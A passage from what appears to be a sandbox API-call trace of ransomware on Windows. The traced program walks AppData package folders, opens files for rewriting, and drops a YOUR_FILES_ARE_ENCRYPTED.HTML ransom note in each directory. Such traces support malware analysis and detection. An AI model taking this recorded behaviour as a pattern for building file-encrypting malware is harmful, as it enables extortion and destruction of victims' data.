(normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.175] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.175] GetProcessHeap () returned 0x600000 [0121.175] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0121.178] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="61") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="AF") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="6E") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="60") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="BD") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="D1") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="31") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="FF") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="3B") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="06") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D3") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="3D") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="96") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="0B") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FD") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="47") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="32") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="48") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EC") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="0B") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="30") returned 2 [0121.178] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="44") returned 2 [0121.178] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DE") returned 2 [0121.179] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="04") returned 2 [0121.179] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="6C") returned 2 [0121.179] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BA") returned 2 [0121.179] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E3") returned 2 [0121.179] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="66") returned 2 [0121.179] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B4") returned 2 [0121.179] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="FC") returned 2 [0121.179] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="9D") returned 2 [0121.179] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5E") returned 2 [0121.179] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat" [0121.179] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.179] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0121.179] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0121.179] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.179] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0121.179] GetProcessHeap () returned 0x600000 [0121.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.180] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.181] CloseHandle (hObject=0x324) returned 1 [0121.181] GetProcessHeap () returned 0x600000 [0121.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.181] GetProcessHeap () returned 0x600000 [0121.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.182] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.182] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.182] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData") returned 96 [0121.182] GetProcessHeap () returned 0x600000 [0121.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.182] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData" [0121.182] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\*" [0121.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.182] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.182] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.182] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.182] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.182] GetProcessHeap () returned 0x600000 [0121.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.183] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.184] CloseHandle (hObject=0x324) returned 1 [0121.184] GetProcessHeap () returned 0x600000 [0121.184] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.184] GetProcessHeap () returned 0x600000 [0121.184] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.184] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.184] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.184] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState") returned 92 [0121.184] GetProcessHeap () returned 0x600000 [0121.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.184] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState" [0121.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\*" [0121.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.184] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.184] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.184] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.184] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.184] GetProcessHeap () returned 0x600000 [0121.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.185] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.186] CloseHandle (hObject=0x324) returned 1 [0121.186] GetProcessHeap () returned 0x600000 [0121.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.186] GetProcessHeap () returned 0x600000 [0121.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.186] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.186] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.186] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0121.186] GetProcessHeap () returned 0x600000 [0121.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.187] WriteFile (in: hFile=0x214, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.188] CloseHandle (hObject=0x214) returned 1 [0121.188] GetProcessHeap () returned 0x600000 [0121.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.188] GetProcessHeap () returned 0x600000 [0121.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.189] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows.ContactSupport_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.CON")) returned 1 [0121.189] StrStrIW (lpFirst="Windows.ContactSupport_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.189] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy") returned 85 [0121.189] GetProcessHeap () returned 0x600000 [0121.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.190] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy" [0121.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\*" [0121.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0121.198] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.198] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.198] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.198] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC") returned 88 [0121.198] GetProcessHeap () returned 0x600000 [0121.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.199] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC" [0121.199] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\*" [0121.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.213] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.213] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0121.214] StrStrIW (lpFirst="INetCache", 